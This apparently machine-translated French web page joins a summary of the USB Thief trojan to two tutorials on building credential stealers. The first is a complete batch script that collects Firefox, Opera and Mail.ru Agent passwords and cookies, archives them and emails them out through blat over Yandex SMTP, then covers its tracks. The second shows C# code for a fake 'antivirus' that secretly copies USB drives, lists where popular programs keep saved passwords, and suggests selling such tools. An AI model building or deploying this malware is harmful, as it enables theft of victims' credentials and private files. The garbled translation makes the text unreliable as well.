Le disque flash le plus simple Grabber. Le voleur USB de Trojan ne quitte pas les traces et ne fonctionne pas sur Flash Drives comment voler des données via un lecteur flash USB et un registre

Troyan extrêmement insolite: Malwar a reçu le nom USB Thief (Win32 / Psw.stealer.nai). MalName est axé sur le vol de données, il s'applique et fonctionne sur des lecteurs flash ordinaires et cache habilement les traces de sa présence dans le système. Troyan est idéal pour le cyber-shypionage, car il est capable d'obtenir même isolé des systèmes réseau, si vous pouvez leur connecter une clé USB.

Contrairement à d'autres menaces USB qui sont écrites en autoload et de fausses applications raccourcis afin que Malwar soit démarre, le voleur USB agit autrement. Le travail de Trojan est conçu pour le fait que les utilisateurs sont souvent stockés sur des versions portables de disques Flash de telles applications telles que Firefox, Notepad ++, Truecrypt, etc. Malwar est soigneusement intégré à une chaîne de téléchargement de tels programmes, qui se délivait pour un fichier plugin ou DLL. Ainsi, lorsque l'utilisateur commence l'application familière à partir du lecteur flash, avec elle (en arrière-plan), Troyan est lancé.

L'auteur inconnu de Malviva a abusé de la protection sérieuse pour son développement. Le voleur USB est lié à chaque lecteur flash infecté à l'aide de son identifiant unique et des paramètres de lecteur. Une partie des fichiers de Trojan est protégée par le cryptage AES128, avec la clé générée avec précision sur la base des paramètres uniques de l'appareil. En outre, les noms de fichiers de Malvari qui essaimant dans chaque cas: ils sont générés sur la base du contenu du flashplay et du temps pour créer des fichiers. Lorsque vous essayez de copier le voleur USB sur un autre lecteur flash ou un disque dur régulier, ce système de protection en deux étapes ne donnera pas à Malvari à gagner, et complique également sérieusement la conduite d'ingénierie inverse.

Structure de Trojan

Le voleur USB fonctionne directement à partir du lecteur flash et ne laisse aucune trace dans le système lui-même. Troyan se compose de six fichiers, dont quatre exécutables et deux autres contiennent des données de configuration. Le premier chargeur est responsable du lancement de Trojan avec une version portable de tout programme. Il vérifie le périphérique USB et veille à ce qu'il puisse enregistrer des informations volées dessus et la stocker ici. Ensuite, le deuxième chargeur commence. Il vérifie les noms des processus parents et veille à ce qu'il fonctionne dans un environnement commun (et personne n'essaie d'analyser). La troisième chargeuse vérifie à son tour la présence dans le système antivirus.

Le dernier, quatrième pailad, qui est incorporé dans le processus de course, est responsable directement pour vol de données. Thiefs USB Kidnaps Documents, images, liste de fichiers de tous les disques disponibles, données de registre Windows et informations collectées à l'aide de WINAUDIT. Toutes les données volées sont enregistrées sur le lecteur flash et sont cryptées à l'aide de la cryptographie elliptique.

Les experts ESET notent que les attaques utilisant le voleur USB ne peuvent pas être qualifiées de pratique courante. Néanmoins, Troyan est très dangereux, car il est difficile de détecter sa présence et, après avoir extraiter une clé USB, aucune trace de l'élection d'informations ne reste du tout. En outre, dans le rapport de la Société, indique que l'auteur de Malvari, si désiré, peut «recharger» sa malveillance, remplaçant le dyiload pour vol de données sur tout autre malwar.

Dans cet article, je vais décrire aussi rapidement et sans trop de difficulté, écrivez et apportez les fichiers de virus avec des mots de passe et l'envoi de tout cela sur la boîte aux lettres.
Commençons par le fait que le virus sera écrit sur BAT "E (CMD, les commandes principales que vous pouvez prises), dans le fichier texte habituel et sera exécutée à l'aide d'une roue intégrée standard de la fenêtre" ligne de commande ".
Afin d'écrire un virus similaire, vous devez connaître l'emplacement de stockage exact de ces fichiers et voler, les composants de la blat pouvant être téléchargés à partir du site OFF http://www.blat.net/ ou de notre serveur, ainsi qu'un composant de l'archiveur WinRar Rar.exe (vous pouvez le faire sans elle).
Notepad ouvert et copier le code suivant:

@echo Off MD% Systemroot% \\ Wincs MD% SystemDrive% \\ Pass \\ MD% SystemDrive% \\ Pass \\ Opera \\ MD% SystemDrive% \\ Pass \\ Mozilla \\ MD% SystemDrive% \\ MD% \\ MD% SystemDrive% \\ Pass Mailagent \\ REG Attrib% Systemroot% \\ Wincs + H + S + R Attrib% SystemDrive% \\ Pass + H + S + R Copie / Y "% Systemroot% \\ blat.exe"% Systemroot% \\ wincs \\ blat.exe " / Y "% Systemroot% \\ blat.dll"% systemroot% \\ wincs \\ blat.dll "copie / y"% systemroot% \\ blat.lib ""% systemroot% \\ wincs \\ blat.lib "cd / d% appdata% \\ Opera \\ Opera \\ copy / y wand.dat% SystemDrive% \\ pass \\ opéra \\ wand.dat copy / y cookies4.dat% systemdrive% \\ pass \\ opéra \\ cookies4.da regedit.exe -a% SystemDrive% \\ Pass \\ Mailagent \\ Reg \\ Agent.reg "HKEY_CURRENT_USER \\ LOGICIEL \\ Mail.ru \\ Agent \\ MAGENT_LOGINS2 REGEDIT.EXE -A% SystemDrive% \\ Pass \\ MailAgent \\ Reg \\ Agent_3.reg" HKEY_CURrent_USER \\ Software \\ Mail.ru \\ Agent \\ MAGENT_LOGINS3 CD / D% Appdata% xCopy MRA \\ Base% SystemDrive% \\ Pass \\ MailAgent / K / H / G / Q / R / S / Y / E\u003e NUL XCOPY MRA \\ UPDATE \\ VER.TXT% SystemDrive% \\ Pass \\ MailAgent / K / H / G / Q / R / S / Y\u003e Nul CD% Appdata% \\ Mozill A \\ Firefox \\ Profils \\ *. Copier \\ Copie / Y Cookies.sqlite% SystemDrive% \\ Pass \\ Mozilla \\ Cookies.Sqlite Copie / Y Key3.db% SystemDrive% \\ Pass \\ Mozilla \\ Key3.db Copie / Y Signons.sqlite % SystemDrive% \\ Pass \\ Mozilla \\ Signons.Sqlite Copie / Y% Windir% \\ Rar.exe% SystemDrive% \\ Pass \\ Rar.exe\u003e \u200b\u200bNul Del / S / Q% Systemroot% \\ Rar.exe% SystemDrive% \\ Pass \\ rar.exe A -r% SystemDrive% \\ Pass \\ Pass.rar% SystemDrive% \\ Pass \\ Copie / Y% SystemDrive% \\ Pass \\ Pass.rar% Systemroot% \\ Wincs \\ Pass.Rar CD% Systemroot% \\ Wincs % Systemroot% \\ Wincs \\ blat.exe -Install -server smtp.yandex.ru -port 587 -F [email protected] -u login -pw mot de passe REN * .rar pass.rar% Systemroot% \\ wincs \\ blot.exe -Body FileSpassword -o [email protected] -attach% Systemroot% \\ Wincs \\ Pass.Rar RMDIR / S / Q% SystemDrive% \\ Pass RMDIR / S / Q% Systemroot% \\ Wincs Del / S / S / S / S / S / Q% Systemroot% \\ Blot. EXE Del / S / Q% Systemroot% \\ blot.dll Del / S / Q% Systemroot% \\ blat.lib Attrib + A + S + H + R% Systemroot% \\ Wind.exe Exit CLS

Pas grand chose à écrire le code du Batinka lui-même.
@echo OFF - cache le corps de Batika (donc ce n'est pas nécessaire, mais toujours)
mD% Systemroot% \\ Wincs - crée un dossier WinCs dans le dossier Système Windows, quel que soit le disque installé ou tel qu'il est nommé.
mD% SystemDrive% \\ Pass \\ - Crée le dossier PASS sur le disque où Windows est installé.
mD% SystemDrive% \\ Pass \\ Opera \\ - Crée un dossier de l'opéra où dans le futur sera copié avec le navigateur de l'opéra (versions maximum de 11 * de l'opéra stocke vos mots de passe dans le fichier wand.dat)
- Crée un dossier Mozilla où les fichiers du navigateur Mozilla continueront à être copiés (cookies.sqlite, key3.db, signons.sqlite) dans lequel les mots de passe sont stockés.
mD% SystemDrive% \\ Pass \\ MailAgent \\ - Crée un dossier Mailagent dans lequel les fichiers contenant les clés de correspondance et les clés de registre (touches de mot de passe) à partir de l'agent de messagerie seront copiés.
mD% SystemDrive% \\ Pass \\ MailAgent \\ Reg - Crée un dossier Reg
attribue% systemroot% \\ wincs + h + s + r - met des attributs au dossier WinCs la masquant ainsi des yeux.
aX% SystemDrive% \\ Pass + H + S + R - la même chose que ci-dessus.
copier / Y "% Systemroot% \\ blat.exe"% Systemroot% \\ Wincs \\ blat.exe " - copie le fichier blat.exe de déchargement dans le dossier Wincs
copier / Y "% Systemroot% \\ blat.dll"% Systemroot% \\ Wincs \\ blat.dll " - copie le fichier blat.dll du déchargement dans le dossier WinCs
copier / y "% systemroot% \\ blat.lib" "% systemroot% \\ wincs \\ blat.lib" - copie le fichier blat.lib de la plug-end dans le dossier Wincs
CD / D% AppData% \\ Opera \\ Opera \\ - Entre le dossier Opera où les fichiers avec mots de passe sont situés (et non seulement) de l'opéra.
copier / Y Wand.Dat% SystemDrive% \\ Pass \\ Opera \\ wand.dat - copie le fichier wand.dat vers le dossier de l'opéra
copier / Y cookies4.dat% SystemDrive% \\ Pass \\ Opera \\ Cookies4.dat - copie le fichier cookies4.dat au dossier Opera
regedit.exe -Aea% SystemDrive% \\ Pass \\ Mailagent \\ Reg \\ Agent.reg "HKEY_CURRENT_USER \\ Software \\ Mail.ru \\ Agent \\ MAGENT_LOGINS2 - Exporte la clé de registre Magent_Logins2 dans laquelle le mot de passe est stocké dans le dossier REG
regedit.exe -aea% SystemDrive% \\ Pass \\ MailAgent \\ Reg \\ Agent.reg "HKEY_CURRENT_USER \\ logiciel \\ mail.ru \\ agent \\ magent_logins3 - Exporte la clé de registre Magent_Logins3 sur laquelle le mot de passe est stocké dans le dossier REG
CD / D% Appdata% - Aller au dossier Appdata
XCOPY MRA \\ BASE% SystemDrive% \\ Pass \\ MailAgent / K / H / G / Q / R / S / Y / E\u003e NUL - copie le contenu du dossier MRA \\ BASE dans le dossier Mailagent
Xcopy mra \\ update \\ ver.txt% SystemDrive% \\ Pass \\ MailAgent / k / h / g / q / r / s / y\u003e nul - copie le fichier ver.txt dans le dossier Mailagent
cD% Appdata% \\ Mozilla \\ Firefox \\ profils \\ * par défaut \\ - Allez au dossier avec un profil de navigateur Mozilles
copier / Y Cookies.SQLite% SystemDrive% \\ Pass \\ Mozilla \\ Cookies.sqlite - copie le fichier cookies.sqlite dans le dossier Mozilla
copier / Y Key3.db% SystemDrive% \\ Pass \\ Mozilla \\ Key3.db - copie le fichier Key3.db dans le dossier Mozilla
copier / Y Signons.Sqlite% SystemDrive% \\ Pass \\ Mozilla \\ Signons.sqlite - copie le fichier Signons.SQLite dans le dossier Mozilla
copier / Y% Windir% \\ rar.exe% SystemDrive% \\ Pass \\ rar.exe\u003e \u200b\u200bNul- Copie le composant archateur WinRar Rar.exe au dossier Pass
del / S / Q% Systemroot% \\ rar.exe - Supprime le composant Archiver dans le dossier Windows
% SystemDrive% \\ PASS \\ RAR.EXE A -R% SystemDrive% \\ Pass \\ Pass.Rar% SystemDrive% \\ Pass \\- Archivez le contenu du dossier Pass
copier / Y% SystemDrive% \\ Pass \\ Pass.rar% Systemroot% \\ Wincs \\ Pass.rar Copiez l'archive créée dans le dossier Wincs
cD% Systemroot% \\ Wincs - Allez au dossier Wincs
% Systemroot% \\ wincs \\ blat.exe -install -server smtp.yandex.ru -port 587 -F [email protected] -u Login -PW Mot de passe - prépare le programme Blat d'envoyer des archives indiquant des données pour l'autorisation et l'envoi de lettres. N'oubliez pas de spécifier vos données à partir de la boîte aux lettres, de l'endroit où la lettre sera envoyée avec l'archive.
rEN * .RA PASS.RAR - Juste au cas où, si l'archive n'a pas accepté le mauvais nom pendant le cours, nous l'avons renommé pour réussir .rar
% SystemRoot% \\ Wincs \\ blat.exe -bony Fichiers mot de passe -To [email protected]. -Attach% systemroot% \\ wincs \\ pass.rar - Indiquez quelle adresse postale sera envoyée par la lettre et l'envoyer.
rMDIR / S / Q% SystemDrive% \\ Pass - Supprimer le dossier Pass
rMDIR / S / Q% Systemroot% \\ Wincs - Supprimer le dossier Wincs
del / S / Q% Systemroot% \\ blat.exe
del / s / q% systemroot% \\ blat.dll - Nous supprimons les composants de la blat du dossier Windows.
del / s / q% systemroot% \\ blat.lib - Nous supprimons les composants de la blat du dossier Windows.
attrib + A + S + H + R% Systemroot% \\ Wind.exe - Nous mettons des attributs de la même manière cacher les yeux.
Sortie - Complétez le processus Batinka et quittez.
cLS - Nettoyez la sortie des lignes de l'immodeur.
Copié, sauvegarder comme vent.bat et compiler dans EXE à l'aide du programme BAT vers EXE Converter, nous recueillons tout en un groupe, c'est-à-dire que nous prenons les composants du programme BLAT et le composant Archiver WinRar (vous pouvez télécharger) et la colle Un fichier exécutable ou avec quel programme, le chemin du déchargement de tous les Falams devrait être% Systemroot% ou% WindowsDir% ou% Windir%.
En conséquence, nous obtenons un virus qui ne passera pas par antivirus et vous enverrons une archive avec des fichiers sur le courrier. Les fichiers qui viendront au courrier peuvent être déchiffrés à l'aide de la récupération multi-mots de passe, ce n'est pas tout, mais seulement wand.dat de l'opéra puis s'il n'est pas mis à jour sur 11 * versions. Tous les autres fichiers peuvent être déchiffrés en remplaçant le vôtre.
À ce sujet, je pense que vous pouvez terminer, si vous avez des questions, n'hésitez pas à demander.
Merci de votre attention, tout va bien!
© Swaper theHeckworld.in.

Pour simples lecteurs de flash mortels - il s'agit d'un dispositif de transfert de documents / films / images et d'autres informations personnelles (et parfois très personnelles). Mais pour les pirates informatiques, le lecteur flash est en même temps une victime et un outil de combat. Aujourd'hui, je vous dirai toutes les subtilités du drain invisible des données à partir de lecteurs de flash à mon ordinateur, ainsi que d'apprendre à transformer des disques flash inoxydistes pour sauvegarder des mots de passe de l'ordinateur "Big".

Lecteurs flash complètes

L'idée du programme "Evil Comp" sera la suivante. Nous développerons une petite boîte à outils qui prétendra être un antivirus de Super Mega avancé, dont le but est un retrait qualitatif des virus «dangereux» des lecteurs flash. Personne ne surprendra personne infectée par les virus clignotants, notre "antivirus" spécialisé ne provoquera donc pas de peur de l'utilisateur crédulable. Au contraire, insérez un lecteur flash à vous dans l'ordinateur et de voir un type de message: «Un virus est découvert. Je fais une analyse détaillée de tous les fichiers pour la présence d'infecté »- Il attendra certainement l'achèvement de cette opération.

Préparation des instruments

Rédigez un tel programme utile que nous serons à la branchée maintenant C #. Flexibilité linguistique et fonctionnalité de la plate-forme large. Il vous permet de développer des applications avec une vitesse de foudre. C'est ce dont nous avons besoin. Nous sommes intéressés par la récolte que nous pouvons collecter et non le processus de codage.

L'un des éléments importants de notre application sera une interface. Plus vous le faites solide, plus la victime ne constate pas que la victime ne remarquera pas l'astuce et attendez-vous calmement l'achèvement de la numérisation antivirus. Je n'ai pas particulièrement de vapeur et a posté une image et une barre de progression sous la forme d'un projet propre. Vous pouvez enlever complètement et faire une conception à couper le souffle. Je vous conseille de voir l'exécution d'un véritable antivirus et approximativement dans le même style pour émettre votre demande.

Nous mettons la tâche

Nous supposons que nous avons décidé de problèmes d'organisation et de l'algorithme d'actions, il est temps de discuter de nuances techniques. Donc, notre anti-virus devrait commencer leur salaire pendant l'installation du lecteur flash. Dès que le nouveau disque apparaît dans le système, notre programme doit déterminer sa lettre et commencer à copier.

Avant de commencer à écrire cet article, le code source d'un programme similaire a été attrapé mes yeux. L'auteur de l'exemple a déterminé le fait de la présence d'un lecteur flash par extinction périodique de tous les disques de présence d'un lecteur de type "support amovible". Au début, je pensais aller de la même manière, mais la voix intérieure suggérée dans l'irrationalité. Avoir tout le "pour" et tout "bien", c'est sur ", j'ai jeté cette idée et je suis allé marcher sur MSND. Cinq minutes plus tard, il s'est avéré que je l'avais pas en vain. La réponse a été trouvée!

Sans winapi nulle part ...

Vous pouvez apprendre plus efficacement sur la connexion de nouveaux équipements (dans notre cas - des lecteurs flash) en attrapant et en analysant le message WM_Devicechange. Lors de l'installation de l'appareil, le message est envoyé à toutes les fenêtres et nous pouvons facilement le traiter dans votre application. Pour cela, il suffit de décrire la fonction WindowProc. En pratique, cela ressemble à ceci:

LRESULT Rappel WindowProc (HWND HWND, // UINT URSG Window ID, // Identificateur de message WPARAM WPARAM, // Evénement survenu LPARAM LPARAM // Pointeur sur la structure contenant des données)

Dans le corps de la fonction, vous devez comparer la valeur du paramètre wparam avec des identificateurs de divers événements liés à WM_Devicechange. Pour notre exemple, ce sera:

  • DBT_DeviceRivall - équipement ajouté
  • Dbt_devicemovecpete - équipement entièrement enlevé
  • D'accord, comment établir le fait de connecter de nouveaux équipements, nous savons, mais comment vous assurer de connecter le lecteur flash? Dispositifs avec la possibilité d'une "connexion chaude" (je suis à propos de USB) un énorme ensemble (imprimante, scanner, modem, etc.). Heureusement, et ce problème est résolu assez simple. Par le paramètre LPARAM, nous pouvons faire référence à la structure _Dev_Broadcast_hdr, qui a un champ dbch_deviceType. Ceci, basé sur la valeur, ce sont des champs et des conclusions appropriées sont faites. S'il est égal à dev_devtyp_volume, il est temps de rejoindre et de battre vos mains - un lecteur flash est connecté à nous!

    TypeDef Strart _Dev_Broadcast_hdr (dbch_size; // DWORD DBCH_DeviceType Taille de la structure; // DWORD DBCH_RERVED; // réservé, réservé, non utilisé) dev_broadcast_hdr, * pdev_broadcast_hdr;

    Dans notre chatte insère un lecteur flash, "nous essaierons de reconnaître la lettre du disque que le système a disparu. Comme dans le "champ des miracles", vous pouvez le deviner, mais il est préférable de tirer des informations de la structure Dev_Broadcast_volume.

    TypeDef Strart _Dev_BroDCast_Volume (DWORD DBCV_SIZE; // DWORD DBCV_DeviceType Taille de la structure; // Device de type DODD DBCV_RESERVÉE; // DWORD DWORD DODCV_UNITMASK; // Lecteur de lecteur de masque de bits DBCV_FLAGS; //) dev_broadcast_volume, * pdev_broadcast_volume;

    De tous les champs de cette structure, nous sommes intéressés par DBCV_Unitmask. Gardez à l'esprit que cette propriété contient uniquement des lettres de bits, et non ses performances symboliques. Par exemple, si la valeur est 0, la lettre de lecteur sera un; Si 1, puis B, etc. Pour la commodité d'obtenir une lettre de personnage, il est préférable d'écrire une fonction.

    Si vous avez lu notre en-tête pendant longtemps et que vous connaissez bien les fonctions de l'API, alors en lisant la partie suivante de l'article, il n'est pas nécessaire. Ouvrez l'éditeur et lancez l'application. J'ai décrit toutes les structures et fonctions nécessaires; Vous pouvez les rassembler dans le programme. Définir, et je vais commencer l'immersion de V.Net et C # en particulier.

    Rester.net "om.

    Il est temps de pratiquer et d'appliquer des connaissances à la langue C #. "Que diable? - Vous vous demandez. "Les stalles ont raconté à propos de Winapi, puis je viens de décider stupidement de faire appel à toutes les fonctions sous la forme d'un code natif? Où est la vitesse de développement déclarée de la foudre? ".

    Dans quelque chose que vous avez raison. Notre application utilisera réellement les fonctions Winapi (il est plus facile), mais nous ne les décrirons pas. De nombreux développeurs ont été confrontés au problème de la définition de lecteurs flash. À la suite de ces sketches, les classes gratuites pour C # ont commencé à apparaître, dans laquelle toutes les fonctionnalités nécessaires sont déjà implémentées. Nous devons simplement connecter une telle pièce (lire le composant) à votre projet et provoquer une paire de méthodes. Nous utiliserons l'une de ces classes maintenant. Mais la connaissance des structures décrites ci-dessus, vous vous seront utiles lors du transfert de ce programme vers Windows API.

    Les classes prêtes à l'emploi décisivent de telles tâches, un excellent ensemble, mais j'ai aimé l'option de Jan Dolinay. Cette personne a écrit très facile à utiliser et à comprendre le code de la classe de drivetector, qui peut:

  • Déterminez le fait de connecter un lecteur flash
  • Définir une demande de démoncation d'un lecteur flash connecté
  • Déterminez le fait que le flash est désactivé
  • Recevez le disque de lettre du lecteur flash nouvellement connecté
  • Fournir une liste de fichiers open-fichiers
  • Et surtout, avec cette classe, il est extrêmement facile de travailler - dans ce que vous vous assurez maintenant. Connecter une classe à son projet est effectué de manière standard et il n'est pas arrêté dans ce sens. Par conséquent, passons immédiatement à l'initialisation. C'est fait comme ça:

    Flashdrivetector \u003d nouveau drivetector (); flashdrivetector.devcearriVived + \u003d nouveau DriveDetectorMermentHandler (ONDRESSARRIVÉ); Flashdrivetector.deviceremoved + \u003d nouveau drivedetactorementhandler (ONDRIVEMONDED);

    Après avoir créé une instance de l'objet de la classe de drivetector, je définis les gestionnaires d'événements DeviarriVived () et Drivemoved (). Selon leur nom, il n'est pas difficile de deviner ce qu'ils répondent. Tout le code d'initialisation est mieux écrit sur la méthode Form1 (). Le code principal de notre programme sera dans le gestionnaire d'événements Devicearveau. Vous verrez son texte sur le frappeur:

    String dirname \u003d environnement.getcommandineargs () + "flash_" + datetime.now.tostring ("DD-mm-yy-hh-mm-ss"); Crééirectory (Dirname); XDirectory Flashcopier \u003d Nouveau XDirectory (); Flashcopier.indexcomplete + \u003d nouvel IndexComePleteVentHandler (IndexCompape); Flashcopier.itemcopied + \u003d nouvel élémentCopiedeventHandler (itemCopied); Flashcopier.copycomplete + \u003d nouvelle copieCompleteeventhandler (copieComplete); Flashcopier.source \u003d nouveau répertoireInfo (e.drive.tostring ()); Flashcopier.Destination \u003d Nouveau DirectoryInfo (Dirname); Flashcopier.overwrite \u003d true; Flashcopier.folderfilter \u003d "*"; Flashcopier.filefilters.add ("*. Doc"); Flashcopier.filefilters.add ("*. XLS"); // définissant d'autres filtres // .... flashcopier.startcopy ();

    Au tout début de la liste, je définirai le chemin du dossier dans lequel nous copierons le contenu du lecteur flash. La copie sera dans le répertoire "Flash_Text Date", située avec le dossier à partir de laquelle notre application est tellement plus pratique. Décider du nom du dossier, j'essaie de le créer à l'aide de la fonction Caredirectory (). J'ai écrit cette fonctionnalité exclusivement pour la commodité. Il se produit une instance de l'objet DirectoryInfo, conçu pour fonctionner avec des répertoires et appeler sa méthode de création (), qui crée un nouveau dossier.

    Après avoir créé un dossier, vous pouvez copier. Je vais copier tous les fichiers à l'aide d'un objet de type XDirectory. Si vous tapez le code de la liste vous-même, alors que vous essayez de compiler le compilateur, le compilateur produira une erreur dans laquelle le noir en blanc sera indiqué: "L'objet de ce type n'est pas trouvé."

    Le fait est que XDirectory est une classe tiers. Il y a une fois il y a longtemps, je l'ai trouvé sur Internet Ineta et depuis lors, j'utilise souvent souvent dans mes projets. Je l'aime dans le fait qu'il suffit d'appeler une méthode pour copier les dossiers investis. De plus, il vous permet d'installer des filtres.

    Vraiment faire sans ça. Nous prenons des cours standard, connus de la réception de tous les programmeurs - Récursion - et écrivez deux douzaines de lignes de code. Hélas, je ne veux pas faire cela catégoriquement. Dans la cour du XXIe siècle, vous devez optimiser vos actions et XDirectory pour nous aider à cela.

    Le module avec la classe réside avec notre disque et vous pouvez en apprendre davantage sur le but des méthodes / des propriétés / des événements en regardant la table appropriée.

    Propriétés de la classe XDirectory

    Méthodes de classe XDirectory

    Essayez d'exécuter notre application et d'insérer un lecteur flash USB. Après quelques secondes (selon les gousses de votre lecteur flash), tout le contenu du lecteur USB est déplacé vers le dossier à partir duquel vous avez lancé une application fraîchement cuite.

    USB GRABBER.

    Considérons maintenant la tâche opposée et parler des nuances de la création de soi-disant. Flashki Grabber. Le principe de créer exactement la même chose. Vous devez écrire une application simple qui démarrera automatiquement après l'installation du lecteur flash.

    Au cours de l'opération, l'application sera méchante par les mots-clés de registre / mots-clés dans lesquels des programmes populaires stockent des mots de passe enregistrés et peuvent être copiés dans l'un de leurs dossiers que possible. Pour que votre directeur automobile soit suspicion d'un utilisateur médiocre, souciez de la masquer à fond. Par exemple, dans le menu de lancement.

    Vous êtes probablement conscient que la version dite portable des applications est devenue très populaire, c'est-à-dire que les programmes peuvent fonctionner directement à partir du lecteur flash. C'est préférable de jouer. Former un programme dans le style approprié et pour la vérité, jetez plusieurs boutons conçus pour exécuter des programmes. Mon option de conception est affichée sur la photo.

    Comment allons-nous voler?

    Je dirai immédiatement que les actions super-hackers n'ont pas besoin de faire ici. La plupart des programmes stockent des données personnelles dans les documents et les paramètres \\ User \\ Données d'application \\% Nom de programme% ou dans le registre. Sous le nom de programme implique tout programme. Si vous rencontrez la première option, vous devrez utiliser la classe XDirectory déjà familière (ou les méthodes standard de travail avec des fichiers) et copier tout ce dont vous avez besoin avec elle. Dans le second cas, vous devrez travailler avec le registre. Un exemple de copie de fichiers ne s'effondrera pas (nous considérons déjà), mais comment interagir avec les outils de registre .NET - Je vais maintenant montrer (sur l'exemple de détermination du chemin du dossier TC):

    Registrykey readkey \u003d registre.currenttuser.opensubkey ("logiciel \\\\ ghisler \\\\ totale commandant"); Touche de chaîne \u003d (string) readkey.getvalue ("installdir");

    C'est tout. Le code ne sera plus. Ces connaissances devraient être suffisantes pour que vous puissiez tirer des fichiers avec des informations précieuses. Pour faire une tâche de relief peu, j'ai préparé une liste des programmes les plus populaires et a peint tous les chemins par lesquels ils stockent les données utilisateur enregistrées.

    Mail.Agent

    Mail.ru Messenger est maintenant très populaire parmi les utilisateurs mortels ordinaires (en particulier chez les femmes). Les objectifs sont clairs, les tâches sont livrées. Nous sommes donc intéressés par:

  • Histori. Toute l'historique des magasins de correspondance de l'utilisateur MA dans des documents et définit \\% utilisateur% \\ appinat données \\ mra \\ base. Le dossier de base a un fichier mra.dbs.. Ceci est strictement parlant, il y a un fichier d'historique.
  • Liste de contacts. La liste de contacts est située dans le dossier MRA \\% Dossier% \\ Clist5.txt Compte utilisateur. Rencontrez, les utilisateurs travaillant avec Mail.Agent peuvent être quelque peu (ou un seul utilisateur peut avoir plusieurs hébergements). Par conséquent, la WISP de tout va copier tous les dossiers contenant le symbole "@" dans le titre.
  • Mot de passe. Mot de passe (plus précisément, son hachage) à partir du compte d'utilisateur est déployé dans le registre de la manière - HKCU \\ Software \\ Mail.ru \\ Agent \\ Magent_Logins2 \\% compte% dans le paramètre de mot de passe ####.
  • gtalk.

    Compagnie Google Crée des produits pratiques et fonctionnels, parmi lesquels il y a un client Gabber - gtalk.. Aujourd'hui gtalk. Pas très populaire. Sur chaque deuxième PC, il n'est pas installé, mais il est parfois trouvé et d'être dans le sujet, il est préférable d'apprendre immédiatement à notre programme d'obtenir des mots de passe et de ce messanger. Mots de passe de tous les comptes GTALK Store dans le registre - HHEY_CURRENT_USER \\ Software \\ Google \\ Google Talk \\ comptes. Dans ce fil, tous les comptes sont énumérés dans lesquels l'entrée a déjà été faite dans gtalk.. Les mots de passe sur le compte sont enregistrés dans le paramètre PW String.

    Commandant total.

    Commandant total. - Certes, le gestionnaire de fichiers le plus populaire. Les fonctions du programme contiennent une voiture approximative et un petit chariot (et autant de nombreuses personnes peuvent être montées avec des plugins supplémentaires). Nous ne sommes intéressés que dans le client FTP intégré. Il utilise beaucoup et des mots de passe, bien sûr conserver.

    TC Contrairement à de nombreux autres programmes ne stocke pas les mots de passe dans le registre et les anciennes fichiers INI utilisent. Mots de passe, ainsi que toutes les données nécessaires à la connexion à des serveurs (IP, ports, nom d'utilisateur, etc.) Commandant total. Magasins dans le fichier wcx_ftp.ini.qui est innocemment situé dans le dossier de programme. Chemin vers le répertoire dans lequel installé Commandant total.Vous pouvez apprendre du registre. Ploy dans le HKEY_CURRENT_USER \\ Software \\ Ghisler \\ Total Commander Brank.

    Firefox.

    Aujourd'hui, le navigateur n'est pas simplement un programme de voyages Web, mais une combinaison complète, qui, outre une variété d'opportunités, maintient beaucoup d'informations confidentielles. Un exemple typique est un formulaire Web. 99% des sites modernes nécessitent une inscription. Rappelez-vous et gardez constamment dans votre tête de connexion / mot de passe pour chaque site - la tâche est irréelle, surtout si vous êtes un utilisateur avancé et le surf de l'Internet, vous n'êtes pas limité à un "camarades de classe" et "vkontakte".

    Les développeurs ont facilité la vie des utilisateurs et intégré les "référentiels de mot de passe" dans les programmes. Je me suis inscrit, je suis allé sous mon compte, commandé au navigateur de se souvenir des informations d'identification - et j'ai oublié. La prochaine fois que vous avez visité, effectuez seulement quelques clics avec la souris et vous êtes déjà sur le site. Étant donné que le navigateur conserve des mots de passe, cela signifie que nous avons la possibilité de faire glisser toute sa base.

  • sessionStore.js - Le fichier contient toutes les sessions enregistrées.
  • signons3.txt - Mots de passe cryptés (pour la troisième version de FF).
  • signons.sqlite - Base SQLite contenant tous les mots de passe cryptés.
  • key3.db est une base de données contenant des clés pour les certificats.
  • Tous ces fichiers sont situés dans votre document déjà familier et vos paramètres \\% Nom d'utilisateur% \\ Application Data \\ Mozilla \\ Firefox \\ profils \\% Nom du profil%.

    Opéra.

    Opéra. - Navigateur, qui est très populaire parmi les utilisateurs russes. Naturellement, nous ne pouvons pas le laisser sans attention. Ainsi, avec l'opéra, la situation est approximativement la même qu'avec Firefox. Tous les mots de passe stockés dans le navigateur sont stockés au document et à Paramètres \\% Nom d'utilisateur% \\ Application Data \\ Opera \\ Profil dans le fichier wand.dat. Il s'avère, lorsque l'opéra est détecté, nous agirons aussi bien que dans le cas de Firefox..

    Skype.

    La popularité de Skype grandit tous les jours. Beaucoup d'entre elles sont utilisées non comme un moyen de faire des appels, mais pour une conversation commode banale. Toutes les données intimes, comme vous devez vous attendre, sont situées dans le profil d'utilisateur (là où elles stockent leur opéra ou leur FF). Pour leur "privatisation" devra copier le profil de l'utilisateur à partir du document et des paramètres \\% Nom d'utilisateur% \\ Application Data \\ skype \\ et Exporter la branche de registre - HKEY_CURrent_USER \\ logiciel \\ Skype \\ ProtectedStorage.

    QIP.

    Comme la plupart des programmes décrits précédemment, QIP Tous les magasins de mots de passe enregistrés dans les données d'application \\ QIP.

    Copie terminée

    La technologie .net nous simplifie fortement la tâche, à la suite de laquelle l'ensemble du codage a été réduit dans un appel à plusieurs méthodes. Bien sûr, vous pouvez dire que ce n'est pas cool et que de telles choses sont plus efficaces pour écrire sur Winapi ou ASM »E. Dans quelque chose, je suis d'accord avec vous, mais en tenant compte de Winapi et, de plus, sur Asme Pour écrire un tel programme, il ne sera donc pas capable de rapidement rapidement. Alors que d'autres écrivent un code kilomètre, nous collecterons la récolte. Bonne chance dans la programmation, et si vous avez des questions, je vous demande, je vous demande, écrivez sur le savon.

    N'oubliez pas que de nombreux utilisateurs stockent des informations confidentielles dans le dossier Mes documents. Au minimum, il peut y avoir des documents de travail intéressants et parfois des fichiers entiers avec des mots de passe. Je suis à mon temps (sur l'ancien travail) J'ai découvert un fichier formaté ordonné avec des mots de passe aux clients sur un compartiment.

    En tant que véritable ami, vous devriez aider toutes ces personnes avec une sauvegarde de leurs informations confidentielles.

    Sur de nombreux forums hackers, de nombreuses annonces pour la vente de logiciels de ce type. Prix \u200b\u200bdifférents - de 10 $ à 100 $. Améliorer des exemples considérés dans l'article, vous pouvez gagner sur la croûte de pain noir avec le caviar. Je répète, la principale chose à aller dans le cas de manière créative et tout va certainement résoudre. Encore une fois, les antivirus ne sont pas détectés;).

    Avertissement!

